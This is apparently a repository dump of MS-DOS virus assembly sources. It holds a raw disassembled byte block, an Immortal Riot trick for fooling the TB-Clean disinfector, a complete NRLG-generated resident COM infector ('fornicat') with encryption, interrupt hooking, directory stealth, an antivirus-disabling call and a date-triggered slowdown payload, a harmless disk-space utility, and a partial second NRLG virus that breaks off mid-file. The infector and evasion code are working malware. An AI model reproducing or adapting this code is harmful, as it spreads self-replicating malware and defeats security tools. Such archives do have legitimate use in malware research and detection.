db 10h,0E8h, 61h, 38h, 6Ch,0C6h
db 00h, 0Eh, 01h,0A9h,0C3h, 50h
db 67h, 0Ch, 08h, 19h, 78h,0D8h
db 0D8h,0DCh, 21h, 0Ch,0B0h, 00h
db 0E0h,0C0h,0C7h, 5Eh, 7Eh,0F3h
db 33h, 33h, 53h,0C1h, 8Fh, 02h
db 4Ch,0F0h, 00h, 00h, 07h, 6Ch
db 7Eh,0CFh,0CCh,0CCh, 7Fh, 03h
db 4Ch, 3Eh, 3Ch, 67h,0C3h,0F3h
db 0DEh,0C0h, 6Eh, 3Ch, 0Ch, 06h
db 0A0h, 08h, 1Ch, 5Ch, 30h, 34h
db 0FCh,0B0h, 09h, 78h, 00h,0D0h
db 7Bh,0CEh,0C6h,0CEh, 76h,0B8h
db 0B8h,0E2h, 1Ch, 3Dh, 72h, 61h
db 03h,0A8h,0F0h, 0Eh, 01h, 61h
db 36h, 82h, 39h, 04h, 02h, 00h
db 03h, 03h,0C6h,0CCh, 8Fh, 8Fh
db 00h, 69h, 0Ah, 30h, 18h, 01h
db 12h, 66h,0FFh,0EBh,0E9h, 84h
db 63h, 01h, 40h, 0Eh, 40h, 60h
db 7Ch,0E6h, 65h, 5Eh,0B3h, 60h
db 0C0h, 83h, 1Eh, 67h, 01h,0CEh
db 2Ch, 5Ah, 40h, 03h,0B3h, 5Ch
db 54h, 03h,0A5h, 04h,0E0h,0C1h
db 0CEh,0CDh,0CCh,0CDh,0CEh, 7Ch
db 0D2h, 86h, 9Fh, 41h, 62h, 60h
db 60h,0F8h,0DFh, 76h, 63h, 00h
db 2Fh, 71h, 6Ch, 3Ch, 3Fh, 3Eh
db 9Ah, 0Ch,0F0h,0B0h, 01h,0D0h
loc_63:
db 6Ah,0BCh, 03h, 43h, 01h, 00h
db 0A8h, 99h, 02h, 36h, 01h,0D0h
db 18h
loc_64:
db 0C6h, 2Dh, 00h, 00h, 01h,0C3h
db 1Ch, 3Fh,0C1h, 3Ch, 66h,0C3h
db 10h, 80h, 08h,0B9h,0C1h, 63h
db 36h, 1Ch,0B1h
loc_65:
add word ptr ds:[0C1h],bp
or [bx+si-28h],bh
xor [si],ah
jl loc_64 ; Jump if <
dec cx
push bx
xor dl,ch
jo loc_65 ; Jump if overflow=1
push cs
add word ptr [bp+0],0
nop ;*ASM fixup - displacement
nop ;*ASM fixup - sign extn byte
add [bx+si],ax
cmp [di+1Ch],bx
and al,18h
add word ptr [bp+7600h],7DCh
esc 6,al ; coprocessor escape
mov al,12h
retn 8857h
into ; Int 4 on overflow
db 66h,0CFh,0C6h, 64h, 81h, 82h
db 0Ch,0CCh, 5Fh,0C6h,0C6h, 4Ch
db 1Eh, 03h, 01h,0CEh, 76h, 1Dh
db 0CAh
db 5Eh, 23h
db 0FEh,0C0h,0A5h, 80h, 90h, 30h
db 78h,0CCh, 00h, 78h, 0Ch, 7Ch
db 90h, 8Bh,0C1h, 7Ah,0B0h, 20h
db 0CCh, 04h, 10h, 8Ch, 87h,0F5h
db 03h, 10h
db 0FFh, 04h, 30h,0C3h,0C2h, 12h
db 2Dh,0CEh, 2Eh, 0Ch, 43h, 50h
db 3Eh, 7Bh, 02h, 60h, 50h, 03h
db 70h,0B0h, 47h, 9Fh, 03h, 20h
db 0B0h, 5Dh, 78h, 38h,0EFh, 3Ch
db 0DEh, 67h,0AFh, 04h, 10h, 80h
db 0CFh, 90h, 02h, 10h,0CFh, 02h
db 0CAh,0B7h, 40h,0D2h, 8Fh, 4Fh
db 21h, 02h, 10h,0DFh,0FEh, 21h
db 1Fh, 4Ch, 50h, 01h,0B7h,0E0h
db 66h,0DBh, 1Bh, 7Fh,0D8h,0D8h
db 0DFh,0B0h, 7Eh, 2Ah,0E9h, 0Bh
db 01h,0FEh, 04h,0DEh,0C3h,0B2h
db 00h,0A3h, 37h,0FBh, 90h, 48h
db 02h, 10h,0DDh,0B3h,0B0h, 00h
db 10h, 30h, 61h,0F6h, 02h, 50h
db 0A0h, 02h, 10h, 0Bh, 9Fh, 6Fh
db 0FCh,0F7h, 10h, 4Fh, 40h, 83h
db 7Fh, 8Fh, 70h, 05h, 5Fh, 70h
db 0C0h,0A8h, 92h, 6Eh,0CDh,0BAh
db 0F0h,0F8h,0E2h,0BEh, 66h,0F6h
db 6Ch, 9Fh, 48h,0EEh, 0Fh, 3Ch
db 20h, 70h, 88h, 7Bh,0FCh,0C0h
db 0CCh,0DEh, 70h, 28h, 80h, 07h
db 0Eh, 56h, 48h, 1Bh, 18h, 3Fh
db 01h, 2Eh, 34h,0D8h, 70h, 01h
db 02h
db 0CCh, 86h,0A0h, 10h, 02h, 40h
db 8Bh,0FFh, 00h, 80h,0F0h, 91h
db 48h, 3Eh, 04h, 7Eh,0D0h, 2Dh
db 0F1h, 60h,0BCh, 5Fh,0E6h, 16h
db 1Ch, 0Fh, 2Bh,0E6h,0F6h,0DEh
db 0CEh, 00h, 34h, 60h, 00h, 3Ch
db 6Ch, 6Ch, 3Eh, 00h, 7Eh, 00h
db 06h,0D1h, 7Ch, 7Ah, 38h, 00h
db 7Ch,0E2h, 90h, 02h,0CDh,0E0h
db 08h, 2Dh, 5Fh, 02h, 55h,0B6h
db 2Eh, 31h,0D2h, 03h, 1Ch,0E1h
db 95h, 51h, 72h, 48h,0CEh, 60h
db 62h, 66h, 6Ch, 85h,0CAh, 0Fh
db 0DCh, 36h, 9Ah, 3Eh, 10h, 36h
db 6Eh,0DEh,0CEh, 25h, 36h, 7Eh
db 23h, 5Ah, 1Eh, 0Eh, 3Ch, 00h
db 62h, 11h, 7Ah,0C4h, 6Ch,0D8h
db 6Ch, 36h, 01h, 4Eh, 72h,0D2h
db 0Eh, 6Ch,0D8h, 0Bh, 11h, 44h
db 0E9h, 74h, 04h, 02h,0AAh, 55h
db 04h, 02h,0DDh, 77h, 04h, 02h
db 5Dh, 7Fh, 18h
db 0Dh, 01h,0F8h, 05h, 0Eh,0DDh
db 0EEh, 10h, 36h, 01h,0F6h, 08h
db 2Fh,0F4h,0A2h, 03h, 10h,0CEh
db 0DBh, 06h, 30h,0F6h, 06h, 30h
db 0EFh, 5Eh, 06h, 01h, 3Eh, 05h
db 20h, 0Fh,0DFh
db 30h
db 0BDh, 12h,0F7h, 6Fh, 10h, 90h
db 05h,0AAh,0EBh, 03h,0F8h, 05h
db 0C0h
db 1Fh, 03h,0A5h, 79h, 30h, 01h
db 0FFh, 06h, 2Ah, 6Fh,0A6h, 06h
db 30h, 05h
db 74h
loc_72:
push word ptr [bx+0Dh]
push es
inc ax
add ax,1F2Eh
add ax,3A3Ah
adc [bx],dh
add ax,ax
aaa ; Ascii adjust
xor [bx],bh
add bp,[bp+3Fh]
popf ; Pop flags
pop si
xor [si],al
and bh,dh
add [si],al
nop
mov dx,0E06h
test word ptr [di],3740h
add sp,[bx+si]
db 0FFh,0FBh,0FFh, 30h, 40h,0BEh
db 0BDh, 30h,0DEh, 04h, 20h,0BAh
db 0DEh, 01h, 06h, 60h,0FFh, 06h
db 0E0h,0A0h,0FBh, 05h, 88h, 3Fh
db 03h,0F0h, 1Fh, 70h, 6Ah, 40h
db 01h, 1Fh, 07h,0D0h, 75h, 20h
db 3Fh, 05h, 40h,0FFh, 04h, 90h
db 0Dh
db 0Dh, 18h, 06h, 60h, 06h,0AFh
db 0DEh,0B0h, 50h,0FFh, 05h, 01h
db 0C2h,0A9h, 00h,0CAh, 01h
loc_75:
lock jmp short loc_75
add ax,0F01h
add ax,601h
cmp ds:data_56e[bx+si],dl
int 10h ; ??INT Non-standard interrupt
jcxz $+2 ; Jump if cx=0
mov al,byte ptr ds:[0CC78h]
esc 0,[bp+si+3615h] ; coprocessor escape
out 0DCh,al ; port 0DCh, DMA-2 clr mask reg
db 0C0h, 70h,0C5h, 62h,0FEh, 66h
db 62h, 71h, 96h,0EDh, 00h, 5Fh
db 6Ch, 01h, 27h, 8Bh,0D0h, 62h
db 80h, 96h, 9Fh, 30h, 62h,0C6h
db 00h, 09h,0E5h, 73h, 7Eh,0D8h
db 20h,0D8h, 70h,0B3h,0E9h, 50h
db 01h, 7Ch, 2Bh,0B3h, 71h, 71h
db 81h, 61h, 01h, 1Ch,0FEh, 38h
db 0EAh,0BDh, 90h, 6Ch, 06h, 40h
db 0ECh, 89h, 9Fh, 33h,0CBh, 61h
db 0Fh, 0Eh, 01h,0EEh,0D5h, 8Ah
db 0D0h, 89h, 3Ch, 66h, 7Ch,0BAh
db 12h, 00h, 19h,0EDh, 70h, 82h
db 53h, 40h, 63h, 02h, 06h, 7Ch
db 0CEh,0DEh,0F6h,0F6h, 3Eh,0D9h
db 70h, 71h, 30h, 32h, 5Ah,0E0h
db 30h, 1Ch, 01h,0D9h,0ADh, 60h
db 01h, 01h, 6Ah,0F5h, 2Dh,0FEh
db 02h, 33h,0AAh,0BEh, 5Fh, 7Eh
db 6Ah, 55h, 90h, 06h, 8Dh,0ADh
db 0ACh, 7Eh, 00h, 6Fh,0F2h,0A3h
db 6Dh, 72h, 0Ch, 1Eh, 1Ah, 29h
db 5Ah, 09h, 12h, 58h, 78h, 30h
db 00h,0A5h,0D5h, 7Ah, 7Eh, 00h
db 03h,0B1h,0B0h, 2Fh, 25h,0D0h
db 5Bh, 97h, 78h,0CCh, 01h,0CAh
db 07h,0FDh, 1Bh,0ADh, 11h, 05h
db 0E1h,0D4h, 0Ah,0D8h,0D8h, 78h
db 38h, 14h,0D8h,0B0h,0A2h, 01h
db 8Ch, 00h,0D8h, 6Ch,0B4h,0A1h
db 04h, 3Fh, 7Eh,0F5h, 36h, 01h
db 00h, 1Ch, 01h,0FCh,0B4h,0A1h
db 00h,0FCh, 00h, 0Dh, 6Dh,0FCh
db 00h,0FCh, 68h, 43h, 00h,0FCh
db 00h, 1Bh,0DAh,0FCh, 00h,0FCh
db 0D0h, 86h, 00h,0FCh, 00h, 36h
db 0B4h,0FCh, 00h,0FCh,0A1h, 0Dh
db 00h,0FCh, 6Dh, 68h, 00h,0FCh
db 00h,0FCh, 43h, 1Bh, 00h,0FCh
db 0DAh,0D0h, 00h,0FCh, 00h, 86h
db 06h, 8Ah, 00h,0FFh, 00h
seg_a ends
end
MSDOS/F-Index/Virus.MSDOS.Unknown.fooltbc.asm
+88
View File
@@ -0,0 +1,88 @@
;
; How to fool TB-Clean using the prefetch queue.
;
; Conzouler / Immortal Riot 1995.
;
; (Ideas from 40Hex magazine issue 7)
;
; Debuggers like TB-Clean reads one instruction a time from
; memory while the processor will read 16 and put them in a
; prefetch queue. Therefore, if you change code that already
; is is in the prefetch the change won't affect the program
; when run normally, but if the program is run with TB-Clean
; it will run the changed code.
; Any branch (jumps, calls, ints and rets) will flush the
; prefetch and 16 bytes will be read from the new position.
; So, you can change the location of a jump to make some
; code run if a debugger is used but another when executed
; normally. Get it?
; The fun part with TB-Clean is that you can use this tech-
; nique to simulate a program restoration but instead you
; put some mean code instead of the original program.
;
; You can also just do an int20 when tbscan is executed and
; make TB-Clean say: "File might not be infected at all or
; is damaged by an overwriting virus". Which is exactly what
; TB-Clean would say if the file wasn't infected in the first
; place.
;
; Try to compile this code and run it, then use TB-Clean on it
; and rerun the "cleaned" file.
;
.model tiny
.code
org 100h
start:
jmp entry
; Carrier file...
carrier db 1+offset nodebug-offset debug dup(90h)
; Your code...
entry:
call delta ; Get delta offset.
delta: pop si ; TbScan will detect this
; but this is about fooling
; TbClean.
mov byte ptr ds:[$+6], 0 ; This changes the jump.
jmp short nodebug ; If this is a near jump
; you'll have to make above
; a word ptr and add 7 instead.
; Here is the code that simulates a restoration.
mov di, 100h ; Offset to entry point.
push di ; Save to perform a ret later
add si, offset debug - offset delta
; Relative offset to routine
; to put at entry point.
mov cx, offset nodebug - offset debug
; Size of routine.
rep movsb ; Move the code.
ret ; Jump to entry point.
debug:
; Here is the routine TBClean will put in the restored program.
mov ah, 9 ; Display string.
mov dx, 100h + offset tbsux - offset debug
int 21h
ret ; Instead of int20
tbsux db 'TB-Clean stinks!!!',7,'$'
nodebug:
; Here is your normal code.
mov ah, 9h ; Display string
add si, offset msg - offset delta
mov dx, si
int 21h
int 20h
msg db 'Hi dudez.. tbclean cannot disinfect diz...$'
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.fornicat.asm
+490
View File
@@ -0,0 +1,490 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿxor word ptr [di],0fbfbh
add byte ptr [di],087h
add word ptr [di],0c574h
add byte ptr [di],0b8h
sub word ptr [di],04d33h
sub byte ptr [di],0b2h
sub word ptr [di],0279h
sub word ptr [di],01bc5h
sub word ptr [di],01a8ah
add word ptr [di],0d649h
add byte ptr [di],0b4h
xor byte ptr [di],0cch
sub byte ptr [di],089h
inc word ptr [di]
xor byte ptr [di],098h
not word ptr [di]
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db 'FORNICAT by [NRLG]'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿnot word ptr [di]
xor byte ptr [di],098h
dec word ptr [di]
add byte ptr [di],089h
xor byte ptr [di],0cch
sub byte ptr [di],0b4h
sub word ptr [di],0d649h
add word ptr [di],01a8ah
add word ptr [di],01bc5h
add word ptr [di],0279h
add byte ptr [di],0b2h
add word ptr [di],04d33h
sub byte ptr [di],0b8h
sub word ptr [di],0c574h
sub byte ptr [di],087h
xor word ptr [di],0fbfbh
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov ax,351ch ;
int 21h ;store the int 1ch vectors
mov word ptr [trampaint+bp],bx ;in cs:trampaint
mov word ptr [trampaint+2+bp],es ;
mov ax,251ch ;put the int 1ch (clock) vector
push cs ;
pop ds ;
mov dx,offset tardar ;in offset tardar
int 21h ;
mov dx,offset fin ;
int 27h ;main resident the code
NO_DAY: ;
ret ;ret for program
tardar: ;int 1c handler
pushf ;
pusha ;
mov cx,0ffffh ;fuck loop for slow speed
trampa: ;
mov ax,ax ;
loop trampa ;
popa ;
popf ;
JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch
ret ;
trampaint dd ? ;
;--------------------------------;
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 020H ;day for the action
action_mes Db 04H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.free.asm
+112
View File
@@ -0,0 +1,112 @@
title FREE.ASM
page,132
cseg segment para 'code'
assume cs:cseg
main proc far
org 100h
start:
jmp begin
banner db 0ah,'FREE Vers 1.0 - Sept. 1985 - by Art Merrill',0dh,0ah,'$'
db 'Copyright (C) 1985',0dh,0ah,'$'
db 'Ziff-Davis Publishing Company',0dh,0ah,'$'
total: db 0ah,8 dup(0),' bytes total disk space',0dh,0ah
diff: db 8 dup(0),' bytes allocated',0dh,0ah
bytes: db 8 dup(0),' bytes available on disk',0dh,0ah,0ah,'$'
hltotal: dw 0,0
hlbytes: dw 0,0
begin:
mov dx,offset banner
mov ah,9
int 21h
mov si,5ch ;address of selected drive
mov dl,[si]
mov ah,36h ;get disk free space
int 21h
push ax ;save for total bytes
push cx ;save for total bytes
push dx ;save for total bytes
mul bx ;get total clusters
mul cx ;get total bytes
std
mov di,offset hlbytes+2
xchg ax,dx
stosw
xchg ax,dx
stosw
mov di,offset bytes+7 ;storage for ascii printout
call ascii
pop dx ;get back total clusters
pop cx ;get back bytes per sector
pop ax ;get back sectors per cluster
mul dx ;total clusters
mul cx ;bytes per sector
mov di,offset hltotal+2 ;same routine as above to get
xchg ax,dx ; total bytes
stosw
xchg ax,dx
stosw
mov di,offset total+8 ;storage for ascii printout
call ascii
mov ax,word ptr hltotal+2 ;calculate difference between
sub ax,word ptr hlbytes+2 ; total bytes and bytes allocated
xchg ax,dx ; to get total bytes remaining
mov ax,word ptr hltotal
sub ax,word ptr hlbytes
jnc skip
dec dx ;adjust total for carry
skip:
mov di,offset diff+7 ;storage for ascii printout
call ascii
mov dx,offset total ;print results
mov ah,9
int 21h
int 20h ;exit
main endp
ascii proc near
xchg bp,dx ;save high word
mov bx,0ah ;divisor
mov cl,30h ;conversion for ascii
rpt1:
cmp bp,0 ;are we done with high words
jz rpt2 ;yes
xchg ax,bp ;no-get high word
xor dx,dx ;clear dx
div bx
xchg bp,ax ;this will be the new high word
div bx ;divide low word + remainder
or dl,cl ;convert hex value to ascii
mov [di],dl ;quotient into storage
dec di ;step back one byte
jmp rpt1 ;go again
rpt2:
xor dx,dx ;clear dx
div bx
or dl,cl ;convert hex value to ascii
mov [di],dl ;quotient into storage
dec di ;step back one byte
cmp ax,0 ;are we done?
jnz rpt2 ;no
ret ;yes
ascii endp
cseg ends
end start

MSDOS/F-Index/Virus.MSDOS.Unknown.freez.asm
+416
View File
@@ -0,0 +1,416 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
